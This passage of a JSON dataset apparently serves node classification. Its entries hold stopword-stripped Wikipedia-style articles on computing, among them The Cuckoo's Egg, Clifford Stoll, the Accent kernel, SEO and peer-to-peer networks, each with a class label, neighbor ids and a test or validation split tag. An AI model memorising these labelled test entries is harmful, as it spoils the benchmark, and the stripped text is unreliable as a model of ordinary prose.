      5771,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      7344,
      2230,
      5816,
      1212,
      700,
      8380,
      10951,
      4298,
      8395,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      6369,
      7907,
      9444,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      7432,
      2314,
      8461,
      6416,
      9490,
      11539,
      788,
      5397,
      7444,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      7983,
      6961,
      8499,
      1844,
      5430,
      823,
      3909,
      4423,
      2378,
      3916,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      5492,
      6519,
      3960,
      376,
      890,
      11128,
      7554,
      8582,
      1927,
      8075,
      11675,
      414,
      2974,
      7070,
      4011,
      4012,
      1454,
      2479,
      6062,
      8114,
      2995,
      7603,
      1464,
      1978,
      9151,
      3522,
      451,
      8643,
      5067,
      7126,
      3551,
      1509,
      9189,
      11256,
      2045,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 8632,
    "label": 4,
    "text": "The_Cuckoo's_Egg:cuckoo egg cuckoo egg tracking spy maze computer espionage 1989 book written clifford stoll first-person account hunt computer hacker broke computer lawrence berkeley national laboratory lbnl author clifford stoll astronomer training managed computers lawrence berkeley national laboratory lbnl california one day 1986 supervisor dave cleveland asked resolve us 0.75 accounting error computer usage accounts stoll traced error unauthorized user apparently used 9 seconds computer time paid stoll eventually realized unauthorized user hacker acquired superuser access lbnl system exploiting vulnerability movemail function original gnu emacs early course long weekend stoll rounded fifty terminals well teleprinters mostly “ borrowing ” desks co-workers away weekend physically attached fifty incoming phone lines hacker dialed weekend stoll located phone line coming tymnet routing service help tymnet eventually tracked intrusion call center mitre defense contractor mclean virginia next ten months stoll spent enormous amounts time effort tracing hacker origin saw hacker using 1200 baud connection realized intrusion coming telephone modem connection stoll colleagues paul murray lloyd bellknap assisted phone lines returning “ borrowed ” terminals stoll left teleprinter attached intrusion line order see record everything hacker watched hacker sought sometimes gained unauthorized access military bases around united states looking files contained words “ nuclear ” “ sdi ” hacker also copied password files order make dictionary attacks set trojan horses find passwords stoll amazed many high-security sites hacker could easily guess passwords since many system administrators never bothered change passwords factory defaults even military bases hacker sometimes able log “ guest ” password one first ⁠— ⁠if first ⁠— documented cases computer break-in stoll seems first keep daily logbook hacker activities course investigation stoll contacted various agents fbi cia nsa air force osi beginning confusion jurisdiction general reluctance share information fbi particular uninterested large sum money involved studying log book stoll saw hacker familiar vms well unix also noted hacker tended active around middle day pacific time eventually stoll hypothesized since modem bills cheaper night people school day job would lot free time hacking night hacker time zone distance east help tymnet various agents various agencies stoll found intrusion coming west germany via satellite deutsche bundespost german post office also authority german phone system traced calls university bremen order entice hacker reveal stoll set elaborate hoax—known today honeypot—inventing fictitious department lbl supposedly newly formed “ sdi “ contract also fictitious realized hacker particularly interested faux sdi entity filled “ sdinet ” account operated imaginary secretary barbara sherwin large files full impressive-sounding bureaucratese ploy worked deutsche bundespost finally located hacker home hanover hacker name markus hess engaged years selling results hacking soviet kgb ancillary proof hungarian spy contacted fictitious sdinet lbl mail based information could obtained hess apparently kgb method double-checking see hess making information selling stoll later flew germany testify trial hess confederate",
    "neighbors": [
      1121,
      10756,
      7557,
      1639,
      4956,
      9256,
      4830,
      7887,
      10110,
      4435,
      5492,
      310,
      8635,
      700,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8633,
    "label": 3,
    "text": "Accent_kernel:accent kernel accent operating system kernel developed carnegie mellon university cmu accent developed follow-on aleph kernel developed university rochester fixing several problems re-targeting hardware support networks workstation machines specifically three rivers perq instead minicomputers accent part spice project cmu ran 1981 1985 development accent led directly famous mach kernel original aleph project used data copying allow programs communicate applications could open ports would allow receive data sent programs idea write number servers would control resources machine passing data along reached end user respect similar concept unix although implementation much different using messages instead memory turned number problems notably copying memory data general eclipse expensive 1979 one aleph engineers richard rashid left cmu started work new version aleph avoided problems particular accent targeted workstation machines featuring mmu using mmu copy large blocks memory via mapping making memory appear two different places data changed one program another would physically copied using copy-on-write algorithm understand difference consider two interacting programs one feeding file another aleph data provider would copied 2kb time due features eclipse user process accent data simply appeared user process cost instructions sent mmu user process changed data would anything need copied even portions data actually changed another problem aleph ports identified unique id assigned sequentially simple program guess thereby gaining access resources computer granted made aleph system rather insecure address accent made port id internal kernel instances program opening ports handed back different ids stored mapping kernel whenever message sent kernel delivery would first check program access port question comparing mapping table program guessing port numbers longer worked program port ids gave clue real ids kernel attempt talk one explicitly handed kernel error thus accent ports represented capabilities granting rights use resources result handed valid port id kind capability system using subject-specific identifiers capabilities called c-list system years accent project started looking less less interesting early 1980s many felt future gains performance would made adding cpus machines something accent kernel really equipped handle adding problem new generation powerful workstations appearing meaning accent would likely ported anyway likewise unix grown operating system choice experimental work operating system design well development platform user applications order address changes decided end work accent start new system would use accent ports system within unix kernel creating famed mach kernel features accent",
    "neighbors": [
      5120,
      7173,
      7561,
      7884,
      6638,
      7983,
      1776,
      2737,
      11539,
      5492
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8634,
    "label": 4,
    "text": "ESign_(India):esign india aadhaar esign online electronic signature service india facilitate aadhaar holder digitally sign document signature service facilitated authenticating aadhar holder via aadhar-based e-kyc electronic know customer service esign document one aadhaar card mobile number registered aadhaar two things indian citizen sign document remotely without physically present notification issued government india regard stipulates following procedure e-authentication using aadhaar e-kyc services authentication electronic record e-authentication technique shall done organisations individuals seeking obtain esigning service utilize services various service providers empanelled service providers organisations register application service prover submitting requisite documents getting uat access building application around service going audit cert-in empanelled auditor however process registering application service provider cumbersome requires huge investments time money resources complying regulations building suitable application organisations prefer using services plug-n-play gateway providers take responsibility complying regulations hence simplifying process market electonic signatureservice esign service",
    "neighbors": [
      1496,
      8674,
      9884
    ],
    "mask": "None"
  },
  {
    "node_id": 8635,
    "label": 4,
    "text": "Clifford_Stoll:clifford stoll clifford paul cliff stoll born june 4 1950 american astronomer author teacher best known investigation 1986 working systems administrator lawrence berkeley national laboratory led capture hacker markus hess stoll subsequent book cuckoo egg details investigation stoll written three books articles non-specialist press e.g. scientific american curta mechanical calculator slide rule frequent contributor mathematics youtube channel numberphile cliff stoll attended hutchinson central technical high school buffalo new york earned b.s astronomy 1973 university buffalo suny studying undergraduate degree suny buffalo stoll worked university electronic music laboratory mentored robert moog received phd university arizona 1980 1960s 1970s stoll assistant chief engineer wbfo public radio station hometown buffalo new york 1986 employed systems administrator lawrence berkeley national laboratory stoll investigated tenacious hacker—later identified kgb recruit markus hess—who stole passwords pirated multiple computer accounts attempted breach us military security identifying intrusion stoll set honeypot hess eventually tracking passing details authorities recognized one first examples digital forensics time gaining cooperation law enforcement challenge due relatively new nature crime described events investigation cuckoo egg tracking spy maze computer espionage paper stalking wily hacker stoll book later chronicled episode wgbh nova titled kgb computer aired pbs stations 1990 1995 book silicon snake oil accompanying article newsweek stoll called prospect e-commerce baloney stoll also raised questions influence internet future society whether would beneficial made various predictions article e.g. e-commerce calling nonviable due lack personal contact secure online funds transfers future printed news publications online database replace daily newspaper article resurfaced boing boing 2010 stoll left self-deprecating comment many mistakes flubs howlers public 1995 howler ... whenever think know happening temper thoughts might wrong cliff ... stoll eighth-grade physics teacher tehiyah day school el cerrito california later taught physics home-schooled teenagers stoll regular contributor msnbc site stoll fcc licensed amateur radio operator call sign k7ta appears frequently brady haran youtube series numberphile stoll sells blown glass klein bottles internet company acme klein bottles stores inventory crawlspace underneath home accesses needed homemade miniature robotic forklift runs company home",
    "neighbors": [
      2437,
      5010,
      4500,
      8469,
      3099,
      7968,
      6177,
      5284,
      9256,
      11182,
      10110,
      10290,
      4789,
      310,
      8632,
      11068,
      2494,
      830,
      5699,
      7369,
      6475,
      10189,
      4049,
      4956,
      4830,
      4834,
      5475,
      7525,
      9319,
      7160,
      11642,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8636,
    "label": 1,
    "text": "Enterprise_Information_Technology_Data_Repository_(EITDR):enterprise information technology data repository eitdr enterprise information technology data repository eitdr united states air force official database presented webservice registering information technology systems maintaining portfolio management data database provides portfolio managers senior leaders investment decision support ability track report compliance federal laws regulations eitdr provides automated management processes common access point gather view load update query report store pertinent data disparate systems eitdr serves single point user entry af data electronic interface dod/af systems requiring data united states code title 40 subtitle iii chapter 113 requires air force chief information officer implement portfolio management process maximizing value assessing managing risks associated information technology acquisition use eitdr result law office secretary air force warfighting integration chief information officer saf/xc primary responsibility november 30 2006 eitdr recorded 146 systems operating budgets exceeding 1 million addition fy06 eitdr operations maintenance costs totaled 4.3 million may 1 2017 eitdr replaced itips system record compliance",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 8637,
    "label": 4,
    "text": "Information_technology_security_audit:information technology security audit computer security audit manual systematic measurable technical assessment system application manual assessments include interviewing staff performing security vulnerability scans reviewing application operating system access controls analyzing physical access systems automated assessments caat include system generated audit reports using software monitor report changes files settings system systems include personal computers servers mainframes network routers switches last decades systematic audit record generation also called audit event reporting described ad hoc early days mainframe mini-computing large scale single-vendor custom software systems companies ibm hewlett packard auditing considered mission-critical function last thirty years commercial off-the-shelf cots software applications components micro computers gradually replaced custom software hardware cost-effective business management solutions transition critical nature audit event reporting gradually transformed low priority customer requirements software consumers little else fall back simply accepted lesser standards normal consumer licenses existing cots software disclaim liability security performance data integrity issues using traditional logging methods applications components submit free-form text messages system logging facilities unix syslog process microsoft windows system security application event logs java applications often fall back standard java logging facility log4j text messages usually contain information assumed security-relevant application developer often computer- network-security expert fundamental problem free-form event records application developer individually determines information included audit event record overall format record presented audit log variation format among thousands instrumented applications makes job parsing audit event records analysis tools novell sentinel product example difficult error-prone domain application specific parsing code included analysis tools also difficult maintain changes event formats inevitably work way newer versions applications time contemporary enterprise operating systems including microsoft windows solaris mac os x freebsd via trustedbsd project support audit event logging due requirements common criteria historically orange book freebsd mac os x make use open source openbsm library command suite generate process audit records importance audit event logging increased recent new post-2000 us worldwide legislation mandating corporate enterprise auditing requirements open source projects openxdas bandit project identity component begun used software security reviews openxdas based open group distributed auditing service specification generally computer security audits performed",
    "neighbors": [
      6273,
      6786,
      5636,
      6797,
      2959,
      10107,
      5677,
      11567,
      2737,
      1465,
      7228,
      11198,
      8904,
      4689,
      5970,
      4318,
      4067,
      612,
      5353,
      8827,
      2801,
      4085,
      3323,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8638,
    "label": 4,
    "text": "Computer_surveillance_in_the_workplace:computer surveillance workplace computer surveillance workplace use computers monitor activity workplace computer monitoring method collecting performance data employers obtain digitalised employee monitoring computer surveillance may nowadays used alongside traditional security applications closed-circuit television depending upon technology methods used monitoring applications may track activity may target specific activities employees company-owned computer terminal may monitor various devices installed computer e.g. web cameras microphones includes recordings devices also remote broadcasting live feed webcams microphones tools used monitoring employee computer usage incorporate also known employee monitoring industry employee monitoring used multiple reasons including compliance insider threat management employee monitoring software monitor application software including email instant message filesystem print jobs internet surveillance monitoring internet data traffic web access online activity may include monitoring internet traffic including encrypted web browser traffic secure socket layer ssl connections personal web-based email personal banking sites research done american management association nearly 30 percent employers united states monitor employee e-mails labor union contracts forms employment agreements may offer protection monitoring additionally united states public sector employees may protection fourth amendment united states constitution employees california may additional protection specific portions state statute employers may required maintain documentation emails communications regulatory compliance purposes monitoring email instant messaging communications may part requirements software used type surveillance may impose additional restrictions notification requirements based end user license agreement eula example spectorsoft requires employees signed contract stating computer activity may monitored employed additional legal issues may arise information obtained monitoring used illegal malicious purposes organizations without stated computer usage monitoring policy employees typically use company equipment respective discretion cases may visible restrictions monitoring activities performed computer use computer surveillance within employee discipline evaluation process may viewed employees invasion privacy lack trust employers right monitor employees united states course specific rules regulations must follow depending state legislation despite fact almost 80 major companies america actively monitor employees. public opinion still mostly employees ’ side americans still think monitoring workplace entirely acceptable according pew research center 6 respondents care monitored work",
    "neighbors": [
      10119,
      2151,
      9227,
      9233,
      8978,
      10392
    ],
    "mask": "Test"
  },
  {
    "node_id": 8639,
    "label": 8,
    "text": "Search_engine_optimization:search engine optimization search engine optimization seo process increasing quality quantity website traffic increasing visibility website web page users web search engine seo refers improvement unpaid results known natural organic results excludes direct traffic/visitors purchase paid placement primarily seo pertains search engine seo may target different kinds search including image search video search academic search news search industry-specific vertical search engines optimizing website may involve editing content adding content modifying html associated coding increase relevance specific keywords remove barriers indexing activities search engines promoting site increase number backlinks inbound links another seo tactic may 2015 mobile search surpassed desktop search internet marketing strategy seo considers search engines work computer programmed algorithms dictate search engine behavior people search actual search terms keywords typed search engines search engines preferred targeted audience seo performed website receive visitors search engine higher website ranks search engine results page serp visitors converted customers seo differs local search engine optimization latter focused optimizing business online presence web pages displayed search engines user enters local search products services former instead focused national international searches webmasters content providers began optimizing websites search engines mid-1990s first search engines cataloging early web initially webmasters needed submit address page url various engines would send spider crawl page extract links pages return information found page indexed process involves search engine spider downloading page storing search engine server second program known indexer extracts information page words contains located weight specific words well links page contains information placed scheduler crawling later date website owners recognized value high ranking visibility search engine results creating opportunity white hat black hat seo practitioners according industry analyst danny sullivan phrase search engine optimization probably came use 1997 sullivan credits bruce clay one first people popularize term may 2 2007 jason gambert attempted trademark term seo convincing trademark office arizona seo process involving manipulation keywords marketing service early versions search algorithms relied webmaster-provided information keyword meta tag index files engines like aliweb meta tags provide guide page content using metadata index pages found less reliable however webmaster choice keywords meta tag could potentially inaccurate representation site actual content inaccurate incomplete inconsistent data meta tags could cause pages rank irrelevant searches web content providers also manipulated attributes within html source page attempt rank well search engines 1997 search engine designers recognized webmasters making efforts rank well search engine webmasters even manipulating rankings search results stuffing pages excessive irrelevant keywords early search engines altavista infoseek adjusted algorithms prevent webmasters manipulating rankings relying much factors keyword density exclusively within webmaster control early search engines suffered abuse ranking manipulation provide better results users search engines adapt ensure results pages showed relevant search results rather unrelated pages stuffed numerous keywords unscrupulous webmasters meant moving away heavy reliance term density holistic process scoring semantic signals since success popularity search engine determined ability produce relevant results given search poor quality irrelevant search results could lead users find search sources search engines responded developing complex ranking algorithms taking account additional factors difficult webmasters manipulate 2005 annual conference airweb adversarial information retrieval web created bring together practitioners researchers concerned search engine optimization related topics companies employ overly aggressive techniques get client websites banned search results 2005 wall street journal reported company traffic power allegedly used high-risk techniques failed disclose risks clients wired magazine reported company sued blogger seo aaron wall writing ban google matt cutts later confirmed google fact ban traffic power clients search engines also reached seo industry frequent sponsors guests seo conferences webchats seminars major search engines provide information guidelines help website optimization google sitemaps program help webmasters learn google problems indexing website also provides data google traffic website bing webmaster tools provides way webmasters submit sitemap web feeds allows users determine crawl rate track web pages index status 2015 reported google developing promoting mobile search key feature within future products response many brands began take different approach internet marketing strategies 1998 two graduate students stanford university larry page sergey brin developed backrub search engine relied mathematical algorithm rate prominence web pages number calculated algorithm pagerank function quantity strength inbound links pagerank estimates likelihood given page reached web user randomly surfs web follows links one page another effect means links stronger others higher pagerank page likely reached random web surfer page brin founded google 1998 google attracted loyal following among growing number internet users liked simple design off-page factors pagerank hyperlink analysis considered well on-page factors keyword frequency meta tags headings links site structure enable google avoid kind manipulation seen search engines considered on-page factors rankings although pagerank difficult game webmasters already developed link building tools schemes influence inktomi search engine methods proved similarly applicable gaming pagerank many sites focused exchanging buying selling links often massive scale schemes link farms involved creation thousands sites sole purpose link spamming 2004 search engines incorporated wide range undisclosed factors ranking algorithms reduce impact link manipulation june 2007 new york times saul hansell stated google ranks sites using 200 different signals leading search engines google bing yahoo disclose algorithms use rank pages seo practitioners studied different approaches search engine optimization shared personal opinions patents related search engines provide information better understand search engines 2005 google began personalizing search results user depending history previous searches google crafted results logged users 2007 google announced campaign paid links transfer pagerank june 15 2009 google disclosed taken measures mitigate effects pagerank sculpting use nofollow attribute links matt cutts well-known software engineer google announced google bot would longer treat nofollow links way prevent seo service providers using nofollow pagerank sculpting result change usage nofollow led evaporation pagerank order avoid seo engineers developed alternative techniques replace nofollowed tags obfuscated javascript thus permit pagerank sculpting additionally several solutions suggested include usage iframes flash javascript december 2009 google announced would using web search history users order populate search results june 8 2010 new web indexing system called google caffeine announced designed allow users find news results forum posts content much sooner publishing google caffeine change way google updated index order make things show quicker google according carrie grimes software engineer announced caffeine google caffeine provides 50 percent fresher results web searches last index ... google instant real-time-search introduced late 2010 attempt make search results timely relevant historically site administrators spent months even years optimizing website increase search rankings growth popularity social media sites blogs leading engines made changes algorithms allow fresh content rank quickly within search results february 2011 google announced panda update penalizes websites containing content duplicated websites sources historically websites copied content one another benefited search engine rankings engaging practice however google implemented new system punishes sites whose content unique 2012 google penguin attempted penalize websites used manipulative techniques improve rankings search engine although google penguin presented algorithm aimed fighting web spam really focuses spammy links gauging quality sites links coming 2013 google hummingbird update featured algorithm change designed improve google natural language processing semantic understanding web pages hummingbird language processing system falls newly recognized term 'conversational search system pays attention word query order better match pages meaning query rather words regards changes made search engine optimization content publishers writers hummingbird intended resolve issues getting rid irrelevant content spam allowing google produce high-quality content rely 'trusted authors leading search engines google bing yahoo use crawlers find pages algorithmic search results pages linked search engine indexed pages need submitted found automatically yahoo directory dmoz two major directories closed 2014 2017 respectively required manual submission human editorial review google offers google search console xml sitemap feed created submitted free ensure pages found especially pages discoverable automatically following links addition url submission console yahoo formerly operated paid submission service guaranteed crawling cost per click however practice discontinued 2009 search engine crawlers may look number different factors crawling site every page indexed search engines distance pages root directory site may also factor whether pages get crawled today people searching google using mobile device november 2016 google announced major change way crawling websites started make index mobile-first means mobile version website becomes starting point google includes index avoid undesirable content search indexes webmasters instruct spiders crawl certain files directories standard robots.txt file root directory domain additionally page explicitly excluded search engine database using meta tag specific robots usually meta name= robots content= noindex search engine visits site robots.txt located root directory first file crawled robots.txt file parsed instruct robot pages crawled search engine crawler may keep cached copy file may occasion crawl pages webmaster wish crawled pages typically prevented crawled include login specific pages shopping carts user-specific content search results internal searches march 2007 google warned webmasters prevent indexing internal search results pages considered search spam variety methods increase prominence webpage within search results cross linking pages website provide links important pages may improve visibility writing content includes frequently searched keyword phrase relevant wide variety search queries tend increase traffic updating content keep search engines crawling back frequently give additional weight site adding relevant keywords web page metadata including title tag meta description tend improve relevancy site search listings thus increasing traffic url canonicalization web pages accessible via multiple urls using canonical link element via 301 redirects help make sure links different versions url count towards page link popularity score seo techniques classified two broad categories techniques search engine companies recommend part good design white hat techniques search engines approve black hat search engines attempt minimize effect latter among spamdexing industry commentators classified methods practitioners employ either white hat seo black hat seo white hats tend produce results last long time whereas black hats anticipate sites may eventually banned either temporarily permanently search engines discover seo technique considered white hat conforms search engines guidelines involves deception search engine guidelines written series rules commandments important distinction note white hat seo following guidelines ensuring content search engine indexes subsequently ranks content user see white hat advice generally summed creating content users search engines making content easily accessible online spider algorithms rather attempting trick algorithm intended purpose white hat seo many ways similar web development promotes accessibility although two identical black hat seo attempts improve rankings ways disapproved search engines involve deception one black hat technique uses hidden text either text colored similar background invisible div positioned screen another method gives different page depending whether page requested human visitor search engine technique known cloaking another category sometimes used grey hat seo black hat white hat approaches methods employed avoid site penalized act producing best content users grey hat seo entirely focused improving search engine rankings search engines may penalize sites discover using black hat methods either reducing rankings eliminating listings databases altogether penalties applied either automatically search engines algorithms manual site review one example february 2006 google removal bmw germany ricoh germany use deceptive practices companies however quickly apologized fixed offending pages restored google search engine results page seo appropriate strategy every website internet marketing strategies effective paid advertising pay per click ppc campaigns depending site operator goals search engine marketing sem practice designing running optimizing search engine ad campaigns difference seo simply depicted difference paid unpaid priority ranking search results purpose regards prominence relevance website developers regard sem utmost importance consideration visibility navigate primary listings search successful internet marketing campaign may also depend upon building high quality web pages engage persuade setting analytics programs enable site owners measure results improving site conversion rate november 2015 google released full 160 page version search quality rating guidelines public revealed shift focus towards usefulness mobile search recent years mobile market exploded overtaking use desktops shown statcounter october 2016 analyzed 2.5 million websites found 51.3 pages loaded mobile device google one companies utilizing popularity mobile usage encouraging websites use google search console mobile-friendly test allows companies measure website search engine results user-friendly seo may generate adequate return investment however search engines paid organic search traffic algorithms change guarantees continued referrals due lack guarantees certainty business relies heavily search engine traffic suffer major losses search engines stop sending visitors search engines change algorithms impacting website placement possibly resulting serious loss traffic according google ceo eric schmidt 2010 google made 500 algorithm changes – almost 1.5 per day considered wise business practice website operators liberate dependence search engine traffic addition accessibility terms web crawlers addressed user web accessibility become increasingly important seo optimization techniques highly tuned dominant search engines target market search engines market shares vary market market competition 2003 danny sullivan stated google represented 75 searches markets outside united states google share often larger google remains dominant search engine worldwide 2007 2006 google 85–90 market share germany hundreds seo firms us time five germany june 2008 market share google uk close 90 according hitwise market share achieved number countries 2009 large markets google leading search engine cases google leading given market lagging behind local player notable example markets china japan south korea russia czech republic respectively baidu yahoo japan naver yandex seznam market leaders successful search optimization international markets may require professional translation web pages registration domain name top level domain target market web hosting provides local ip address otherwise fundamental elements search optimization essentially regardless language october 17 2002 searchking filed suit united states district court western district oklahoma search engine google searchking claim google tactics prevent spamdexing constituted tortious interference contractual relations may 27 2003 court granted google motion dismiss complaint searchking failed state claim upon relief may granted march 2006 kinderstart filed lawsuit google search engine rankings kinderstart website removed google index prior lawsuit amount traffic site dropped 70 march 16 2007 united states district court northern district california san jose division dismissed kinderstart complaint without leave amend partially granted google motion rule 11 sanctions kinderstart attorney requiring pay part google legal expenses",
    "neighbors": [
      3462,
      3979,
      140,
      2318,
      1812,
      7962,
      7837,
      8735,
      5536,
      9768,
      7982,
      6576,
      1206,
      444,
      4165,
      5193,
      10313,
      79,
      119,
      10713,
      9187,
      3688,
      10604,
      8046,
      113,
      6002,
      9972,
      7669,
      3191,
      3836
    ],
    "mask": "Test"
  },
  {
    "node_id": 8640,
    "label": 7,
    "text": "Peer-to-peer:peer-to-peer peer-to-peer p2p computing networking distributed application architecture partitions tasks workloads peers peers equally privileged equipotent participants application said form peer-to-peer network nodes peers make portion resources processing power disk storage network bandwidth directly available network participants without need central coordination servers stable hosts peers suppliers consumers resources contrast traditional client-server model consumption supply resources divided emerging collaborative p2p systems going beyond era peers similar things sharing resources looking diverse peers bring unique resources capabilities virtual community thereby empowering engage greater tasks beyond accomplished individual peers yet beneficial peers p2p systems previously used many application domains architecture popularized file sharing system napster originally released 1999 concept inspired new structures philosophies many areas human interaction social contexts peer-to-peer meme refers egalitarian social networking emerged throughout society enabled internet technologies general p2p systems previously used many application domains concept popularized file sharing systems music-sharing application napster originally released 1999 peer-to-peer movement allowed millions internet users connect directly forming groups collaborating become user-created search engines virtual supercomputers filesystems basic concept peer-to-peer computing envisioned earlier software systems networking discussions reaching back principles stated first request comments rfc 1 tim berners-lee vision world wide web close p2p network assumed user web would active editor contributor creating linking content form interlinked web links early internet open present day two machines connected internet could send packets without firewalls security measures contrasts broadcasting-like structure web developed years precursor internet arpanet successful client-server network every participating node could request serve content however arpanet self-organized lacked ability provide means context content-based routing beyond 'simple address-based routing therefore usenet distributed messaging system often described early peer-to-peer architecture established developed 1979 system enforces decentralized model control basic model client-server model user client perspective offers self-organizing approach newsgroup servers however news servers communicate one another peers propagate usenet news articles entire group network servers consideration applies smtp email sense core email-relaying network mail transfer agents peer-to-peer character periphery e-mail clients direct connections strictly client-server relationship may 1999 millions people internet shawn fanning introduced music file-sharing application called napster napster beginning peer-to-peer networks know today participating users establish virtual network entirely independent physical network without obey administrative authorities restrictions peer-to-peer network designed around notion equal peer nodes simultaneously functioning clients servers nodes network model network arrangement differs client–server model communication usually central server typical example file transfer uses client-server model file transfer protocol ftp service client server programs distinct clients initiate transfer servers satisfy requests peer-to-peer networks generally implement form virtual overlay network top physical network topology nodes overlay form subset nodes physical network data still exchanged directly underlying tcp/ip network application layer peers able communicate directly via logical overlay links corresponds path underlying physical network overlays used indexing peer discovery make p2p system independent physical network topology based nodes linked within overlay network resources indexed located classify networks unstructured structured hybrid two unstructured peer-to-peer networks impose particular structure overlay network design rather formed nodes randomly form connections gnutella gossip kazaa examples unstructured p2p protocols structure globally imposed upon unstructured networks easy build allow localized optimizations different regions overlay also role peers network unstructured networks highly robust face high rates churn —that large numbers peers frequently joining leaving network however primary limitations unstructured networks also arise lack structure particular peer wants find desired piece data network search query must flooded network find many peers possible share data flooding causes high amount signaling traffic network uses cpu/memory requiring every peer process search queries ensure search queries always resolved furthermore since correlation peer content managed guarantee flooding find peer desired data popular content likely available several peers peer searching likely find thing peer looking rare data shared peers highly unlikely search successful structured peer-to-peer networks overlay organized specific topology protocol ensures node efficiently search network file/resource even resource extremely rare common type structured p2p networks implement distributed hash table dht variant consistent hashing used assign ownership file particular peer enables peers search resources network using hash table key value pairs stored dht participating node efficiently retrieve value associated given key however order route traffic efficiently network nodes structured overlay must maintain lists neighbors satisfy specific criteria makes less robust networks high rate churn i.e large numbers nodes frequently joining leaving network recent evaluation p2p resource discovery solutions real workloads pointed several issues dht-based solutions high cost advertising/discovering resources static dynamic load imbalance notable distributed networks use dhts include tixati alternative bittorrent distributed tracker kad network storm botnet yacy coral content distribution network prominent research projects include chord project kademlia past storage utility p-grid self-organized emerging overlay network coopnet content distribution system dht-based networks also widely utilized accomplishing efficient resource discovery grid computing systems aids resource management scheduling applications hybrid models combination peer-to-peer client-server models common hybrid model central server helps peers find spotify example hybrid model 2014 variety hybrid models make trade-offs centralized functionality provided structured server/client network node equality afforded pure peer-to-peer unstructured networks currently hybrid models better performance either pure unstructured networks pure structured networks certain functions searching require centralized functionality benefit decentralized aggregation nodes provided unstructured networks coopnet cooperative networking proposed system off-loading serving peers recently downloaded content proposed computer scientists venkata n. padmanabhan kunwadee sripanidkulchai working microsoft research carnegie mellon university basically server experiences increase load redirects incoming peers peers agreed mirror content thus off-loading balance server information retained server system makes use fact bottle-neck likely outgoing bandwidth cpu hence server-centric design assigns peers peers 'close ip neighbors prefix range attempt use locality multiple peers found file designates node choose fastest neighbors streaming media transmitted clients cache previous stream transmit piece-wise new nodes peer-to-peer systems pose unique challenges computer security perspective like form software p2p applications contain vulnerabilities makes particularly dangerous p2p software however peer-to-peer applications act servers well clients meaning vulnerable remote exploits also since node plays role routing traffic network malicious users perform variety routing attacks denial service attacks examples common routing attacks include incorrect lookup routing whereby malicious nodes deliberately forward requests incorrectly return false results incorrect routing updates malicious nodes corrupt routing tables neighboring nodes sending false information incorrect routing network partition new nodes joining bootstrap via malicious node places new node partition network populated malicious nodes prevalence malware varies different peer-to-peer protocols studies analyzing spread malware p2p networks found example 63 answered download requests gnutella network contained form malware whereas 3 content openft contained malware cases top three common types malware accounted large majority cases 99 gnutella 65 openft another study analyzing traffic kazaa network found 15 500,000 file sample taken infected one 365 different computer viruses tested corrupted data also distributed p2p networks modifying files already shared network example fasttrack network riaa managed introduce faked chunks downloads downloaded files mostly mp3 files files infected riaa virus unusable afterwards contained malicious code riaa also known uploaded fake music movies p2p networks order deter illegal file sharing consequently p2p networks today seen enormous increase security file verification mechanisms modern hashing chunk verification different encryption methods made networks resistant almost type attack even major parts respective network replaced faked nonfunctional hosts decentralized nature p2p networks increases robustness removes single point failure inherent client-server based system nodes arrive demand system increases total capacity system also increases likelihood failure decreases one peer network fails function properly whole network compromised damaged contrast typical client–server architecture clients share demands system resources case clients join system fewer resources available serve client central server fails entire network taken advantages disadvantages p2p networks related topic data backup recovery availability centralized network system administrators forces controlling availability files shared administrators decide longer distribute file simply remove servers longer available users along leaving users powerless deciding distributed throughout community makes entire system vulnerable threats requests government large forces example youtube pressured riaa mpaa entertainment industry filter copyrighted content although server-client networks able monitor manage content availability stability availability content choose host client trouble accessing obscure content shared stable centralized network p2p networks however unreliable sharing unpopular files sharing files p2p network requires least one node network requested data node must able connect node requesting data requirement occasionally hard meet users may delete stop sharing data point sense community users p2p network completely responsible deciding content available unpopular files eventually disappear become unavailable people stop sharing popular files however highly easily distributed popular files p2p network actually stability availability files central networks centralized network simple loss connection server clients enough cause failure p2p networks connections every node must lost order cause data sharing failure centralized system administrators responsible data recovery backups p2p systems node requires backup system lack central authority p2p networks forces recording industry riaa mpaa government unable delete stop sharing content p2p systems p2p networks clients provide use resources means unlike client-server systems content-serving capacity peer-to-peer networks actually increase users begin access content especially protocols bittorrent require users share refer performance measurement study property one major advantages using p2p networks makes setup running costs small original content distributor many file peer-to-peer file sharing networks gnutella g2 edonkey network popularized peer-to-peer technologies peer-to-peer networking involves data transfer one user another without using intermediate server companies developing p2p applications involved numerous legal cases primarily united states conflicts copyright law two major cases grokster vs riaa mgm studios inc. v. grokster ltd. last case court unanimously held defendant peer-to-peer file sharing companies grokster streamcast could sued inducing copyright infringement companies power ledger bovlabs employ peer-to-peer energy trading platforms cooperation among community participants key continued success p2p systems aimed casual human users reach full potential large numbers nodes contribute resources current practice p2p networks often contain large numbers users utilize resources shared nodes share anything often referred freeloader problem freeloading profound impact network cases cause community collapse types networks users natural disincentives cooperate cooperation consumes resources may degrade performance studying social attributes p2p networks challenging due large populations turnover asymmetry interest zero-cost identity variety incentive mechanisms implemented encourage even force nodes contribute resources researchers explored benefits enabling virtual communities self-organize introduce incentives resource sharing cooperation arguing social aspect missing today p2p systems seen goal means self-organized virtual communities built fostered ongoing research efforts designing effective incentive mechanisms p2p systems based principles game theory beginning take psychological information-processing direction peer-to-peer networks e.g freenet place heavy emphasis privacy anonymity—that ensuring contents communications hidden eavesdroppers identities/locations participants concealed public key cryptography used provide encryption data validation authorization authentication data/messages onion routing mix network protocols e.g tarzan used provide anonymity although peer-to-peer networks used legitimate purposes rights holders targeted peer-to-peer involvement sharing copyrighted material peer-to-peer networking involves data transfer one user another without using intermediate server companies developing p2p applications involved numerous legal cases primarily united states primarily issues surrounding copyright law two major cases grokster vs riaa mgm studios inc. v. grokster ltd. cases file sharing technology ruled legal long developers ability prevent sharing copyrighted material establish criminal liability copyright infringement peer-to-peer systems government must 